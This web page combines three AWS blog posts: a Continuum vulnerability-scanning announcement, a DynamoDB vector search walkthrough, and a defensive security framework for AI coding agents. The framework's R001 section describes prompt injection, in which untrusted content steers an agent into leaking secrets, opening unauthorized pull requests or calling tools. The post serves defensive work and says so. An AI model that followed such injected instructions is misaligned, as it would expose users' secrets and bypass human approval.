AWS Continuum for code vulnerabilities discovers vulnerabilities, prioritizes them within the context of a customer’s business, validates them in a sandbox, and provides remediation at machine speed. Under the hood, Continuum is an agent-team loop architecture. A sophisticated harness that orchestrates all of it: selecting the right model, connecting to a customer environment, and delivering secure code that’s been validated in context. You never need to think about how the orchestration works, or what changed in the latest release.
Anthropic and OpenAI partnerships
Today we’re announcing partnerships with Anthropic and OpenAI to bring Continuum into the developer workflows where code is being written.
How it works:
Within Claude Code, Codex, and Kiro coding environments, on-demand vulnerability scans identify potential issues and send findings to Continuum. Continuum prioritizes them within the context of the customer’s AWS environment (configurations, AWS Identity and Access Management (IAM) policies, network topology, and exposure surfaces) and validates them in a sandbox. It then returns prioritized, contextual intelligence back to the coding assistant, which adjusts its recommendations accordingly.
This collapses what was traditionally a multi-step, multi-team process (write, scan, triage, prioritize, fix, rescan) into a single outcome: the code suggestion itself. Two modes, one outcome:
For existing code: Use Continuum for code vulnerabilities from AWS to discover, prioritize, validate, and remediate across your environment.
For greenfield code: Use the Continuum plugin within Codex, Claude Code, or Kiro to get security-validated suggestions in your development environment.
Early design partners are already seeing results.
“AWS Continuum connects source code with enterprise knowledge, allowing teams to accurately pinpoint security vulnerabilities and verify that flagged issues are truly meaningful. This shortens what really matters: timeline to fix serious vulnerabilities.” – Mike Johnson, CISO, Rivian
Next
AWS Continuum for code vulnerabilities is available in preview through AWS. Sign up to request access at AWS Continuum.
Continuum integrated into Claude Code, Codex, and Kiro workflows are coming soon.
If you have feedback about this post, submit comments in the Comments section below.
Today, we’re announcing the general availability of vector search in Amazon DynamoDB. You can now store vector embeddings alongside your operational data in DynamoDB and run similarity searches directly against that data, without replicating it to a separate vector store.
DynamoDB supports native vector search with single-digit millisecond latency at 99%+ recall, and is designed for any scale, even trillions of vectors. There are no servers to provision, patch, or manage, and no software to install, maintain, or operate. The service has no versions, no maintenance windows, and zero downtime maintenance.
Vector indexes have no storage limits and scale horizontally as your data grows. You can now build applications that require semantic retrieval on agentic memory, retrieval augmented generation, recommendation engines, personalized experiences, anomaly detection, and more using DynamoDB and its native vector search.
If your application already uses DynamoDB, adding vector search previously required copying data into a dedicated vector database while maintaining a synchronization pipeline between the two services. This added operational overhead, data movement costs, licensing costs, and the challenge of maintaining predictable low latency at scale. With vector search built into DynamoDB, your vectors and operational data share the same serverless infrastructure and the same pay-per-request pricing model.
Vector search in DynamoDB introduces a new index type that you create on an attribute storing vector embeddings. You generate embeddings using a model of your choice, such as Amazon Bedrock Titan Text Embeddings, Cohere Embed, or OpenAI text embedding models, and store them as a list of floats in your table using a standard PutItem call. You then create a vector index on that attribute and specify the number of dimensions, the distance function, and any non-vector attributes you want to use as filters to narrow search results at query time. The SearchVectors API accepts a query vector, the number of results to return (up to 100), and optional filter conditions. It returns results ranked by similarity.
Use vector search in DynamoDB when your operational data already lives in DynamoDB and you want to add similarity search without provisioning a separate database or managing a synchronization pipeline. DynamoDB is fully serverless, so vector search scales automatically with no infrastructure to manage. It supports up to 4096 dimensions, Euclidean, Cosine, and Dot product distance functions, and inline filtering.
Getting started with vector search in DynamoDB This walkthrough shows how to add vector search to an existing DynamoDB table using the DynamoDB console. The scenario contains an online sporting goods store with a product catalog table. Each item has standard operational attributes such as productId, category, description, marketplace, name, and price. The goal is to add semantic search so shoppers can find products using natural language queries rather than exact keyword matches.
1. Prepare DynamoDB table To enable semantic search, I first generate vector embeddings for the product descriptions already in my table. Embeddings are numerical representations of text generated by a machine learning model that capture the meaning of the content. Two items with similar descriptions will have embeddings that are close to each other in vector space, which is what makes similarity search possible.
For an existing table like ProductCatalog, I add the embeddings to each item as a new attribute named descriptionEmbedding using an UpdateItem call. DynamoDB stores vector embeddings using its existing List data type. Each element in the list is a Number that represents a single float value of the embedding vector. This means I do not need a new data type or schema change to start storing vectors alongside my existing operational attributes.
2. Create vector index In the DynamoDB console, open the ProductCatalog table and choose the Indexes tab. I choose Create vector index. On the Create vector index page, I fill in the index details as follows. I enter ProductDescriptionIndex as the Index name and descriptionEmbedding as the Vector attribute.
I enter the number of Dimensions that matches my embedding model’s output and select Cosine as the Distance function. Cosine measures the angle between vectors rather than their magnitude, which makes it effective for comparing semantic similarity of text embeddings. Vector search in DynamoDB also supports Euclidean and Dot product distance functions.
Euclidean: Use when the magnitude of the vectors is meaningful, such as clustering items by a numeric value like purchase count.
Dot product: Use when both direction and magnitude matter, such as in recommendation systems that weight interest alignment and frequency together. As a general rule, match the distance function to the one used to train your embedding model for the best accuracy.
I enter marketplace as the Partition key. The vector index partition key controls how DynamoDB distributes vectors across partitions, allowing the index to scale out while maintaining predictable latencies. Each search is scoped to a single partition key value, so a product catalog serving multiple marketplaces can search within one marketplace’s inventory without scanning the entire index. The partition key is optional, but recommended for large datasets with high query throughput.
I expand Inline filter attributes and add category as a filter attribute. This helps me narrow search results to a specific product category at query time. Filter conditions support exact-match values only; range conditions such as BETWEEN or BEGINS_WITH are not supported. I leave Attribute projections set to All so that all table attributes are returned with my search results. Choose Create vector index and wait for the index status to change to Active.
3. Run vector search I generate a query vector from a natural language search term such as “lightweight running shoes for summer” using the same embedding model I used for the product descriptions. In the DynamoDB console, I choose Explore items in the left navigation pane and select the ProductCatalog table.
Choose Search to switch to vector search mode. I select ProductDescriptionIndex from the Select a vector index dropdown, paste the query vector into the Search vector field, and set Number of results (Top K) to 5. I enter US as the Partition key value to scope the search to the US marketplace. I expand Inline filter attributes and set category equal to footwear to narrow the search to footwear products only. Now, choose Run.
DynamoDB returns the five most semantically similar products in the footwear category, ranked by similarity score, alongside the standard operational attributes such as name and price in the same response. The similarity score’s meaning depends on the distance function selected for the index. For Cosine and Euclidean distance functions, lower similarity score values indicate higher similarity, with a score of 0 indicating identical vectors. For the dot product distance function, higher similarity score values indicate higher similarity.
To interact with vector search programmatically, including calling APIs and searching documentation, try the AWS MCP Server and plugins with your preferred AI coding tool. To learn more, visit the Amazon DynamoDB Developer Guide.
Get started today Vector search in Amazon DynamoDB is generally available in all commercial AWS Regions, including the AWS GovCloud (US) Regions. For Regional availability and a future roadmap, visit the AWS Capabilities by Region. For pricing details, visit the Amazon DynamoDB pricing page.
Start exploring vector search in DynamoDB today and send feedback to AWS re:Post for Amazon DynamoDB or through your usual AWS Support contacts.
AI coding agents are part of the developer toolchain. Tools like Kiro and Claude Code generate features, tests, and code refactors from natural-language prompts. A single agent can open dozens of pull requests (PRs) across your repositories in an afternoon. That productivity comes with a trade-off: agents optimize for task completion at machine speed with no understanding of your organization’s risk.
Through protocols like the Model Context Protocol (MCP), agents also reach beyond the integrated development environment (IDE) to call APIs, query databases, and modify infrastructure and even entire environments, expanding the scope of resources your application security team defends.
This post lays out an application security (AppSec) control framework for AI coding agents. Two pillars organize the framework: author-time controls shape what the agent produces in the IDE; build-time controls verify and gate what reaches production. Your existing secure software development lifecycle (SDLC) controls still apply and are critical to a defense-in-depth security strategy. The framework shows where to layer additional guardrails so AppSec scales with agent-driven development. The framework is tool-agnostic and cloud-agnostic. Throughout, we use AWS services—Kiro in the IDE and AWS CodePipeline in the build—as a running example that you can adapt to your own toolchain.
Risks
Each of the following risks includes a treatment summary. The control framework section later in this post provides implementation details. The risks are ordered by severity with the highest impact risks first.
R001. Prompt and context injection
Agents read untrusted content, such as issue descriptions, web pages, MCP responses, and README files in third-party packages. Text from outside parties can redirect the agent to disclose secrets, open unauthorized PRs, or invoke tools without user consent. This risk, known as prompt injection, is the top risk in the OWASP Top 10 for LLM Applications. Any agent that reads content from outside parties is exposed, with or without MCP, so connecting tools widens the scope of impact.
Treatment: Treat non-developer input as untrusted. A large language model (LLM) can’t reliably separate instructions from data in a single context window, so architect for it: keep the agent that orchestrates trusted actions separate from the one exposed to untrusted content and grant the exposed agent only read-only, least-privilege access. Require human approval for irreversible actions. Use version-control steering files to prevent silent tampering.
R002. Inadvertent data disclosure and overly permissive configurations
Agents optimize for getting work done. Left unchecked, the code they generate can default to wildcard identity and access management policies, open security groups, and unencrypted storage, or embed sensitive values in code rather than referencing a secrets manager. Most coding agents now include safety mechanisms that make these outcomes less likely, but they remain imperfect, so you still need controls to account for the possibility.
Treatment: Security requirements in a steering document, plus policy-as-code scanning (Checkov, cfn-nag) in the IDE and pipeline. See Context as a security control.
R003. Uncontrolled changes reaching production
Ungated code reaching production isn’t new, but AI agents amplify it. Machine-speed generation can propagate a flawed pattern across repositories before it’s identified.
Treatment: Branch protection rules requiring PR approval (a human-in-the-loop checkpoint), pre-commit hooks for security checks, and sandboxed agent runs that prevent direct pushes to protected branches. The right balance between human review and automated speed depends on the risk profile of the change. For many low-risk paths, automated checks alone might suffice, while higher-risk changes warrant a human checkpoint.
R004. Supply chain risks
Agents don’t always distinguish current best practices from outdated patterns. They might recommend deprecated packages, reference library versions with new Common Vulnerabilities and Exposures (CVEs), and hallucinate package names that don’t exist, which can introduce risks of dependency confusion issues.
Treatment: Software Composition Analysis (SCA) in the pipeline (for example, Amazon Inspector code scanning or Dependabot) to flag vulnerable or unexpected dependencies. For additional control, resolve against a scoped registry like AWS CodeArtifact. Even without a fully curated registry, lockfile validation and allow-listing critical packages reduce exposure.
R005. Uncontrolled external access
Through MCP and tool integrations, agents query databases, call APIs, and modify infrastructure. Without constraints on which tools and data an agent can reach, a single misconfigured integration provides unintended access to sensitive resources.
Treatment: Scope MCP servers to least-privilege tools and resources, enforce authn or authz on external connections, and audit tool invocations. The control point is the configuration file. Review it the same way you review AWS Identity and Access Management (IAM) policies.
R006. Hallucinations and incorrect code
Agents produce plausible-looking output. Code that compiles, passes linting, and looks reasonable can still be functionally wrong: misusing APIs, introducing subtle logic errors, or implementing security-sensitive operations incorrectly. Code that passes continuous integration (CI) but is wrong slips through review; code that fails to build is caught immediately.
Treatment: Layer deterministic verification (static application security testing (SAST), unit tests) with non-deterministic review (LLM-assisted screening against the specification). Neither catches everything alone.
R007. Scope creep
Given a bug-fix prompt, an agent might also refactor surrounding code, disable an unreliable test, or reorganize imports. Unrequested changes introduce regressions and complicate review.
Treatment: A reviewed specification document that defines what must change and what must not, paired with a targeted review of the proposed changes. See Specifications as scope boundaries.
The preceding risks share a common thread: agents produce output faster than humans can review it, and they lack context to self-correct.
The following framework addresses this gap. It organizes controls into two pillars: author-time (pre-generation and post-generation of code) and build-time (in the pipeline, before code reaches production). Author-time controls shape what the agent produces. Build-time controls verify it. Neither is sufficient alone; together they reduce the volume and severity of issues that reach human reviewers.
Deterministic compared to non-deterministic mitigations
Deterministic mitigations[D] produce the same result every time. Linters, SAST scanners, secrets detection, and policy-as-code match patterns against rules and define security invariants: no critical findings, no hardcoded secrets, and no wildcard IAM policies. Use them when the condition can be expressed as a rule. Organizations already have these and must continue enforcing them.
Non-deterministic mitigations [ND] use model judgment. They include steering documents, LLM-as-judge review, specification compliance checks, and scope-creep detection, and they evaluate intent rather than patterns. They catch novel issues that rules miss, but are probabilistic. Use them when evaluation requires context or reasoning across files. This is the new layer that AI-generated code demands, because agents produce code that can pass every deterministic check yet remain functionally wrong.
Human review[H] provides the final layer for the risk-based decisions neither tool type can make. Apply it where judgment is needed, not everywhere: routing every change to a person invites consent fatigue, where reviewers approve by reflex and the control loses its value. The default reflex is to route everything back to a human, but that isn’t always the right response—reserve human judgment for the decisions that genuinely need it.
The control framework
The framework organizes controls into two pillars. Author-time controls (Pillar 1) shape what the agent produces in the IDE, before code is generated and just after. Build-time controls (Pillar 2) verify and gate that output in the pipeline, before it reaches production. The controls within each pillar are tagged deterministic [D], non-deterministic [ND], or human [H].
Pillar 1: Author-time controls (pre- and post-generation of code)
Author-time controls work inside the IDE, where the developer and agent still hold full context. They shape the prompt and the generated output before it ever reaches a pull request. The following controls apply at this stage.
Context as a security control [ND]
Control statement: Encode security invariants as natural-language constraints in a steering document that every developer environment consumes at session start. Addresses R002. Many AI coding agent risks share one root cause: the agent lacks the security context an experienced developer carries implicitly. Your security team sets the policies, such as Amazon Simple Storage Service (Amazon S3) buckets require encryption, API gateways require mutual TLS, and credentials must come from AWS Secrets Manager. Developers don’t always have these requirements available when they’re building. They build what works, not what’s compliant. An AI agent amplifies this gap because it defaults to whatever pattern dominated its training data, with no awareness of your organization’s security posture.
A key mitigation is steering. Security teams write these invariants once as natural-language guidance in a steering document, then distribute them as shareable resources that developers consume in their IDE. The agent loads the file at session start and treats the contents as standing requirements:
IAM policies must follow least-privilege principles; no wildcard Amazon Resource Names (ARNs).
No hardcoded credentials in source code; use a secrets manager.
Security groups must not allow unrestricted inbound access.
This shifts security left, before code generation begins. Steering biases generation toward secure defaults; it doesn’t guarantee them. Treat it as a strong default, paired with the following deterministic gates that block non-compliant code from merging. Security teams define the rules once and every developer environment inherits them automatically. Steering reduces the volume of issues that reach the pipeline, though it doesn’t replace downstream scanning.
How to write effective steering rules: Keep each rule specific and testable, scope it to a concrete risk class, keep the rule set concise so the agent can hold it in context, and iterate from the issues your scanners and reviewers surface.
Specifications as scope boundaries [ND]
Control statement: Require a reviewed specification before code generation begins. Define what must change and what must not. Addresses R007.
Spec-driven workflows turn vague prompts into reviewable specifications before code is generated. This creates a human checkpoint at the design phase, where security decisions are made:
Requirements use testable notation that’s auditable before the agent writes a line of code. For example, the Easy Approach to Requirements Syntax (EARS): WHEN [condition] THE SYSTEM SHALL [behavior].
Tasks are ordered in implementation steps, each mapped back to a requirement.
For bug fixes, specifications add a critical element: unchanged behavior documentation. This is an explicit list of behaviors that must continue working, giving the agent a written boundary against scope creep.
In this model, the specification becomes the primary artifact, code is a derivative of it. Human review effort concentrates on whether the specification solves the right problem with the right constraints, not on reading implementation diffs line by line.
Controlled tool access using MCP [D + ND]
Control statement: Scope each MCP server to the minimum set of tools the agent needs, and give it a dedicated, scoped-down credential rather than the developer’s own. Maintain an allowlist of reviewed MCP servers. Addresses R005.
MCP servers act as controlled gateways between the agent, the external tools, and data:
Dependency management – An MCP server fronting your private package registry resolves dependencies against curated packages, not the public internet. This is a deterministic constraint on supply chain risk.
Infrastructure tooling – Visibility into current resource configurations prevents templates that conflict with existing infrastructure.
Scoped permissions – Each MCP server exposes a defined set of tools and resources. You choose exactly what the agent can access, supporting least-privilege at the integration layer. You supply that credential through the agent’s configuration (in Kiro, the env block of .kiro/settings/mcp.json). Avoid autoApprove: ["*"], which removes the human approval prompt on every tool call.
IDE code scanning [D]
Control statement: Run real-time static analysis in the IDE so security issues surface while the developer (and agent) still have full context. Addresses R002, R006.
Real-time diagnostics catch syntax errors, type mismatches, and configuration issues as the developer types. A malformed IAM policy is flagged before the agent builds further on it. Security-focused extensions (ESLint security plugins, Checkov, SAST) layer on top for immediate feedback while code is fresh in context.
Hooks: Automated guardrails at the point of action [D + ND]
Control statement: Attach deterministic checks to file-save events and non-deterministic verification to task-completion events. Addresses R002, R007.
Shell command hooks [D] – Triggered on file save, these run a linter, formatter, or security scanner and produce the same result every time. They enforce hard rules.
AI-powered hooks [ND] – Triggered on task completion. These prompt the agent to verify that the implementation matches the specification and check for any untested edge cases or files that were modified outside the task’s scope.
Pillar 2: Build-time controls (in the pipeline)
Build-time controls run in the pipeline after code is committed and before it reaches production. They verify and gate what the agent produced, catching what author-time controls did not. The following controls apply at this stage.
Layered security scanning [D]
Control statement: Run secrets detection, static analysis, dependency scanning, and infrastructure-as-code scanning in sequence. Fail the build on any critical finding. Addresses R002, R003, R004.
Secrets detection runs first because it’s cheapest and addresses a high-severity class of issue. It scans for hardcoded API keys, database connection strings, and credentials that AI agents might inadvertently include.
SAST scans source code for injection issues, insecure deserialization, and resource leaks. Custom rules can target AI-specific anti-patterns including overly broad exception handling, deprecated APIs, placeholder credentials, dynamic code execution through eval().
Software Composition Analysis (SCA) identifies known CVEs in dependencies. This is critical for AI-generated code, which might reference deprecated packages or hallucinate package names that open you to dependency confusion issues.
Infrastructure as code (IaC) scanning validates AWS CloudFormation, Terraform, and AWS Cloud Development Kit (AWS CDK) templates against security policies before deployment. Catches overly permissive IAM roles, unencrypted storage, and public-facing resources the agent created.
Each stage halts the pipeline on failure. Results export to a standard format (Static Analysis Results Interchange Format (SARIF)) for compliance auditing and flow downstream to human reviewers. The open source Automated Security Helper (ASH) bundles secrets, SAST, SCA, and IaC scanners behind one command that you can run locally and in AWS CodeBuild, emitting SARIF for the gates that follow.
Quality gates [D]
Control statement: Define pass/fail thresholds for each scan type. Block deployment on any critical or high-severity finding. Addresses R003.
Quality gates convert scan results into go/no-go decisions. Define thresholds for each severity: block on critical findings, require justification for highs, and track mediums. The gate is deterministic: if a threshold is breached, the pipeline stops. Exceptions require documented approval.
Differentiate blocking compared to advisory modes: hard failures on main, advisory on feature branches. Avoid gates becoming a friction that teams route around.
AI-assisted review [ND]
Control statement: Use an LLM reviewer to pre-screen every pull request for specification compliance, scope creep, and security anti-patterns before human review. Addresses R001, R006, R007.
Specification compliance – Does the implementation match the requirements document?
Scope verification – Were files modified outside the task’s stated scope?
Security pattern review – Are there logic errors, misused APIs, or insecure patterns that pass SAST but violate intent?
This pre-screening focuses human reviewer attention on genuine risks rather than formatting or obvious issues. On AWS, AWS Security Agent (code review in preview at publication) checks pull requests against AWS-managed and custom security requirements. The reviewer screens and surfaces findings; the merge decision stays with a human.
A critical principle: the agent that wrote the code should not be the agent that reviews it. A separate session helps avoid self-confirmation bias, but a separate session alone doesn’t always avoid the generator’s blind spots, because two sessions of the same model can share them. Where practical, use a different model for review so the reviewer is less likely to inherit the same systematic weaknesses.
Human-in-the-loop review [ND + H]
Control statement: Require human approval on most pull requests, especially those touching security-sensitive or high-blast-radius code. Lower-risk changes might be eligible for agent-assisted or fully automated approval as tooling matures. Provide reviewers with scan results, LLM pre-screening output, and specification context to enable fast, informed decisions. Addresses R003.
Scale review depth to the risk of the change. Low-risk or boilerplate changes can take a lighter-touch review, while security-sensitive or novel-logic changes warrant mandatory deep review and a second reviewer.
Scanners catch known patterns but can’t judge whether code implements the intended business logic. Human review also serves to calibrate trust: teams build intuition about where agents excel (boilerplate, test writing) and where they’ve tended to struggle (novel business logic, security-sensitive operations), recognizing that this frontier shifts as models improve.
Place two approval gates: after security scans (reviewer focuses on correctness and business logic, with scan results as context) and before production deployment (final sign-off after integration testing). Treat human review as a secondary control, not a guarantee: reviewers are themselves non-deterministic and can miss issues, so human review layers on top of the deterministic gates rather than replacing them.
Putting the framework into practice on AWS
The framework is tool-agnostic, but AWS gives you building blocks for each pillar. The following services map directly to the controls described previously: Kiro for author-time guardrails, and CodeBuild and CodePipeline for build-time gates.
Kiro: Structured AI development
Kiro maps to Pillar 1: It puts the author-time controls in the IDE, where the developer and agent still share full context. Each feature in the following list implements one of those controls, configured in-repo under .kiro/ so the guardrails are version-controlled and shared across the team rather than set per developer.
Steering documents – Markdown files in .kiro/steering/ load into the agent’s context at session start. Conditional inclusion using fileMatch (for example, ["**/*.tf"]) loads IaC-specific rules only when relevant.
Specification-driven workflows – Three-phase specifications (requirements in EARS, design, and tasks) with review checkpoints. Bug-fix specifications capture unchanged behavior explicitly.
Agent hooks – Triggered on file save, tool invocation, or task completion. Shell hooks run deterministic checks (linters, tests); Ask Kiro hooks run AI prompts for non-deterministic review. For example, a security pre-commit scanner hook can flag hardcoded credentials when the agent finishes a task.
Property-based testing – Guided by a specification or hook, Kiro can generate property-based tests (for example, using the hypothesis library) that exercise hundreds of randomized inputs, probing edge cases a hand-written test suite would miss.
MCP integrations – Connect Kiro to private package registries, internal docs, issue trackers, and infrastructure tooling, creating the controlled tool access pattern.
AWS CodeBuild and AWS CodePipeline: Pipeline controls
CodeBuild runs each scanning tool (checking for secrets, SAST, SCA, and IaC) as a build action. A non-zero exit code fails the action, and the stage halts or rolls back according to its OnFailure setting. Findings export as SARIF to Amazon S3 for compliance, and CodePipeline action variables pass results to downstream approval actions.
CodeBuild exit codes halt the pipeline on scan failures
AWS Lambda invoke actions evaluate scan results against configurable thresholds and return pass/fail decisions
Manual approval actions halt the pipeline, send Amazon Simple Notification Service (Amazon SNS) notifications, and link to review artifacts; decisions and reviewer identity are logged for audit
The following table consolidates the framework into a single view that includes each stage of the SDLC and the deterministic [D] and non-deterministic [ND] controls that apply there. Every stage carries both, a reminder that neither control type is sufficient on its own.
Full security scan suite, integration tests, and policy-as-code
AI-assisted review for human approvers
Post-deploy
Runtime monitoring and anomaly detection
AI-powered incident triage
Conclusion
This post laid out a framework for adopting AI coding agents at machine speed without letting unreviewed risk reach production. It layers guardrails at two points:
Author-time controls – Steering, specs, and scoped tools shape what the agent generates in the IDE.
Build-time controls – Scanning, quality gates, and layered review verify it before it reaches production.
No single layer is enough: deterministic gates enforce hard rules, non-deterministic review catches what they miss, and human judgment is reserved for the decisions that need it. Together, they let AppSec scale with agent-driven development.
Where to start this week:
Start with steering and specs – Encode security requirements as steering and use specifications for new features. Highest impact, lowest effort. For a ready-made starting set, the open source Project CodeGuard (a Coalition for Secure AI project under OASIS Open, of which Amazon is a contributing member) publishes reusable steering rules for common risk classes—hardcoded credentials, IaC misconfiguration, supply chain, and MCP security—that you can adapt to your AWS environment.
Add deterministic pipeline gates – Integrate SAST, SCA, and secrets detection. Table-stakes regardless of AI usage.
Calibrate and iterate – Review what controls catch, adjust steering for recurring issues, and expand agent autonomy as trust builds.
Accountability – Developers remain accountable for the security of what they ship. AI agents accelerate development; they don’t transfer ownership.
If you have feedback about this post, submit comments in the Comments section below.
The collective thoughts of the interwebz
Manage Consent
To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.
Functional
Always active
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
Preferences
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Statistics
The technical storage or access that is used exclusively for statistical purposes.The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Marketing
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.